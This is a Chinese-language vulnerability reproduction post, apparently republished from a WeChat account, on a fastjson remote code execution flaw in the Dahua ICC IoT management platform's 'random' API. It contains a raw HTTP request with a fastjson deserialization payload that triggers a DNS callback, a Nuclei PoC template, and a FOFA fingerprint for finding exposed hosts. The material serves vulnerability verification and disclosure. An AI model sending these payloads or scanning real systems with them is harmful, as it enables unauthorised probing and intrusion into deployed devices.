免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
大华ICC智能物联综合管理平台 版本不详
03
—
漏洞描述
大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。
04
—
icon_hash="-1935899595"
05
—
漏洞复现
借助http://dnslog.pw/dns/进行复现,随机生成一个账号复制payload替换下面的farr9frh.dnslog.pw,向靶场发送如下数据包
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 161Accept-Encoding: gzipConnection: closeContent-Type: application/json;charset=utf-8{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}}""}
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: dahua-icc-random-rceinfo:name: 大华ICC智能物联综合管理平台random远程代码执行漏洞author: fgzseverity: criticaldescription: 大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。metadata:max-request: 1fofa-query: icon_hash="-1935899595"verified: truerequests:- raw:- |+POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/json;charset=utf-8Accept-Encoding: gzipConnection: close{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}}""}matchers:- type: dsldsl:- contains(interactsh_protocol, "dns")condition: and
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):大华ICC智能物联综合管理平台random远程代码执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论